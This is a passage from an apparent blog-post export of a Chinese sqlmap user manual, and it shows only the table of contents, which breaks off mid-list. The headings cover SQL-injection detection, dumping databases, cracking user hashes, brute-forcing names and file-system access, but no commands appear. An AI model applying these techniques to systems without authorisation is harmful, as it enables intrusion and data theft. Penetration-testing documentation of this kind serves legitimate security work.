{"id":108,"date":"2014-10-19T13:50:20","date_gmt":"2014-10-19T13:50:20","guid":{"rendered":""},"modified":"2014-10-19T13:50:20","modified_gmt":"2014-10-19T13:50:20","slug":"","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=108","title":{"rendered":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87%E6%96%B9%E5%BC%8F\" title=\"\n\t\u83b7\u53d6\u76ee\u6807\u65b9\u5f0f \n\">\n\t\u83b7\u53d6\u76ee\u6807\u65b9\u5f0f \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%9B%AE%E6%A0%87URL\" title=\"\n\t\u76ee\u6807URL \n\">\n\t\u76ee\u6807URL \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E6%96%87%E6%9C%AC%E4%B8%AD%E8%8E%B7%E5%8F%96%E5%A4%9A%E4%B8%AA%E7%9B%AE%E6%A0%87%E6%89%AB%E6%8F%8F\" title=\"\n\t\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf \n\">\n\t\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E6%96%87%E4%BB%B6%E4%B8%AD%E5%8A%A0%E8%BD%BDHTTP%E8%AF%B7%E6%B1%82\" title=\"\n\t\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dHTTP\u8bf7\u6c42 \n\">\n\t\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dHTTP\u8bf7\u6c42 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%A4%84%E7%90%86Google%E7%9A%84%E6%90%9C%E7%B4%A2%E7%BB%93%E6%9E%9C\" title=\"\n\t\u5904\u7406Google\u7684\u641c\u7d22\u7ed3\u679c \n\">\n\t\u5904\u7406Google\u7684\u641c\u7d22\u7ed3\u679c \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AF%B7%E6%B1%82\" title=\"\n\t\u8bf7\u6c42 \n\">\n\t\u8bf7\u6c42 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=108\/#http%E6%95%B0%E6%8D%AE\" title=\"\n\thttp\u6570\u636e \n\">\n\thttp\u6570\u636e \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%8F%82%E6%95%B0%E6%8B%86%E5%88%86%E5%AD%97%E7%AC%A6\" title=\"\n\t\u53c2\u6570\u62c6\u5206\u5b57\u7b26 \n\">\n\t\u53c2\u6570\u62c6\u5206\u5b57\u7b26 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP_cookie%E5%A4%B4\" title=\"\n\tHTTP&nbsp;cookie\u5934 \n\">\n\tHTTP&nbsp;cookie\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP_User-Agent%E5%A4%B4\" title=\"\n\tHTTP&nbsp;User-Agent\u5934 \n\">\n\tHTTP&nbsp;User-Agent\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP_Referer%E5%A4%B4\" title=\"\n\tHTTP&nbsp;Referer\u5934 \n\">\n\tHTTP&nbsp;Referer\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A2%9D%E5%A4%96%E7%9A%84HTTP%E5%A4%B4\" title=\"\n\t\u989d\u5916\u7684HTTP\u5934 \n\">\n\t\u989d\u5916\u7684HTTP\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP%E8%AE%A4%E8%AF%81%E4%BF%9D%E6%8A%A4\" title=\"\n\tHTTP\u8ba4\u8bc1\u4fdd\u62a4 \n\">\n\tHTTP\u8ba4\u8bc1\u4fdd\u62a4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81\" title=\"\n\tHTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1 \n\">\n\tHTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=108\/#HTTPS%E4%BB%A3%E7%90%86\" title=\"\n\tHTTP(S)\u4ee3\u7406 \n\">\n\tHTTP(S)\u4ee3\u7406 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP%E8%AF%B7%E6%B1%82%E5%BB%B6%E8%BF%9F\" title=\"\n\tHTTP\u8bf7\u6c42\u5ef6\u8fdf \n\">\n\tHTTP\u8bf7\u6c42\u5ef6\u8fdf \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E8%B6%85%E6%97%B6%E6%97%B6%E9%97%B4\" title=\"\n\t\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4 \n\">\n\t\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E9%87%8D%E8%AF%95%E8%B6%85%E6%97%B6\" title=\"\n\t\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6 \n\">\n\t\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-19\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E9%9A%8F%E6%9C%BA%E6%94%B9%E5%8F%98%E7%9A%84%E5%8F%82%E6%95%B0%E5%80%BC\" title=\"\n\t\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c \n\">\n\t\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-20\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%A9%E7%94%A8%E6%AD%A3%E5%88%99%E8%BF%87%E6%BB%A4%E7%9B%AE%E6%A0%87%E7%BD%91%E5%9D%80\" title=\"\n\t\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740 \n\">\n\t\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-21\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%81%BF%E5%85%8D%E8%BF%87%E5%A4%9A%E7%9A%84%E9%94%99%E8%AF%AF%E8%AF%B7%E6%B1%82%E8%A2%AB%E5%B1%8F%E8%94%BD\" title=\"\n\t\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d \n\">\n\t\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-22\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%85%B3%E6%8E%89URL%E5%8F%82%E6%95%B0%E5%80%BC%E7%BC%96%E7%A0%81\" title=\"\n\t\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801 \n\">\n\t\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-23\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%AF%8F%E6%AC%A1%E8%AF%B7%E6%B1%82%E6%97%B6%E5%80%99%E6%89%A7%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84python%E4%BB%A3%E7%A0%81\" title=\"\n\t\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801 \n\">\n\t\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-24\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%85%A5\" title=\"\n\t\u6ce8\u5165 \n\">\n\t\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-25\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B5%8B%E8%AF%95%E5%8F%82%E6%95%B0\" title=\"\n\t\u6d4b\u8bd5\u53c2\u6570 \n\">\n\t\u6d4b\u8bd5\u53c2\u6570 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-26\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u6307\u5b9a\u6570\u636e\u5e93 \n\">\n\t\u6307\u5b9a\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-27\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%B3%BB%E7%BB%9F\" title=\"\n\t\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf \n\">\n\t\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-28\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8C%87%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E5%A4%A7%E6%95%B0%E5%AD%97\" title=\"\n\t\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57 \n\">\n\t\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-29\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%8F%AA%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E9%80%BB%E8%BE%91\" title=\"\n\t\u53ea\u5b9a\u65e0\u6548\u7684\u903b\u8f91 \n\">\n\t\u53ea\u5b9a\u65e0\u6548\u7684\u903b\u8f91 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-30\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%85%A5payload\" title=\"\n\t\u6ce8\u5165payload \n\">\n\t\u6ce8\u5165payload \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-31\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%85%A5%E7%9A%84%E6%95%B0%E6%8D%AE\" title=\"\n\t\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e \n\">\n\t\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-32\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8E%A2%E6%B5%8B\" title=\"\n\t\u63a2\u6d4b \n\">\n\t\u63a2\u6d4b \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-33\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8E%A2%E6%B5%8B%E7%AD%89%E7%BA%A7\" title=\"\n\t\u63a2\u6d4b\u7b49\u7ea7 \n\">\n\t\u63a2\u6d4b\u7b49\u7ea7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-34\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A3%8E%E9%99%A9%E7%AD%89%E7%BA%A7\" title=\"\n\t\u98ce\u9669\u7b49\u7ea7 \n\">\n\t\u98ce\u9669\u7b49\u7ea7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-35\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A1%B5%E9%9D%A2%E6%AF%94%E8%BE%83\" title=\"\n\t\u9875\u9762\u6bd4\u8f83 \n\">\n\t\u9875\u9762\u6bd4\u8f83 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-36\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%85%A5%E6%8A%80%E6%9C%AF\" title=\"\n\t\u6ce8\u5165\u6280\u672f \n\">\n\t\u6ce8\u5165\u6280\u672f \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-37\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B5%8B%E8%AF%95%E6%98%AF%E5%90%A6%E6%98%AF%E6%B3%A8%E5%85%A5\" title=\"\n\t\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165 \n\">\n\t\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-38\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E5%BB%B6%E8%BF%9F%E6%B3%A8%E5%85%A5%E7%9A%84%E6%97%B6%E9%97%B4\" title=\"\n\t\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4 \n\">\n\t\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-39\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E5%AD%97%E6%AE%B5%E6%95%B0\" title=\"\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570 \n\">\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-40\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E5%AD%97%E7%AC%A6\" title=\"\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26 \n\">\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-41\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BA%8C%E9%98%B6SQL%E6%B3%A8%E5%85%A5\" title=\"\n\t\u4e8c\u9636SQL\u6ce8\u5165 \n\">\n\t\u4e8c\u9636SQL\u6ce8\u5165 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-42\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E6%95%B0%E6%8D%AE\" title=\"\n\t\u5217\u6570\u636e \n\">\n\t\u5217\u6570\u636e \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-43\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%A0%87%E5%BF%97\" title=\"\n\t\u6807\u5fd7 \n\">\n\t\u6807\u5fd7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-44\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%94%A8%E6%88%B7\" title=\"\n\t\u7528\u6237 \n\">\n\t\u7528\u6237 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-45\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u5f53\u524d\u6570\u636e\u5e93 \n\">\n\t\u5f53\u524d\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-46\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E6%98%AF%E5%90%A6%E4%B8%BA%E7%AE%A1%E7%90%86%E7%94%A8\" title=\"\n\t\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528 \n\">\n\t\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-47\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%94%A8%E6%88%B7\" title=\"\n\t\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237 \n\">\n\t\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-48\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E5%B9%B6%E7%A0%B4%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E7%9A%84hash\" title=\"\n\t\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash \n\">\n\t\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-49\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90\" title=\"\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650 \n\">\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-50\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E8%A7%92%E8%89%B2\" title=\"\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272 \n\">\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-51\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93 \n\">\n\t\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-52\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8\" title=\"\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868 \n\">\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-53\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E4%B8%AD%E7%9A%84%E5%AD%97%E6%AE%B5\" title=\"\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5 \n\">\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-54\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%9E%B6%E6%9E%84\" title=\"\n\t\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784 \n\">\n\t\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-55\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E8%A1%A8%E4%B8%AD%E6%95%B0%E6%8D%AE%E4%B8%AA%E6%95%B0\" title=\"\n\t\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570 \n\">\n\t\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-56\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E6%95%B4%E4%B8%AA%E8%A1%A8%E7%9A%84%E6%95%B0%E6%8D%AE\" title=\"\n\t\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e \n\">\n\t\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-57\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E7%9A%84%E5%86%85%E5%AE%B9\" title=\"\n\t\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9 \n\">\n\t\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-58\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%90%9C%E7%B4%A2%E5%AD%97%E6%AE%B5%EF%BC%8C%E8%A1%A8%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93 \n\">\n\t\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-59\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%BF%90%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84SQL%E8%AF%AD%E5%8F%A5\" title=\"\n\t\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5 \n\">\n\t\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-60\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%88%86%E7%A0%B4\" title=\"\n\t\u7206\u7834 \n\">\n\t\u7206\u7834 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-61\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E8%A1%A8%E5%90%8D\" title=\"\n\t\u66b4\u529b\u7834\u89e3\u8868\u540d \n\">\n\t\u66b4\u529b\u7834\u89e3\u8868\u540d \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-62\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%88%97%E5%90%8D\" title=\"\n\t\u66b4\u529b\u7834\u89e3\u5217\u540d \n\">\n\t\u66b4\u529b\u7834\u89e3\u5217\u540d \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-63\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5\" title=\"\n\t\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165 \n\">\n\t\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-64\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C\" title=\"\n\t\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c \n\">\n\t\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c \n<\/a><ul class=\"ez-toc-list-level-3\"><li 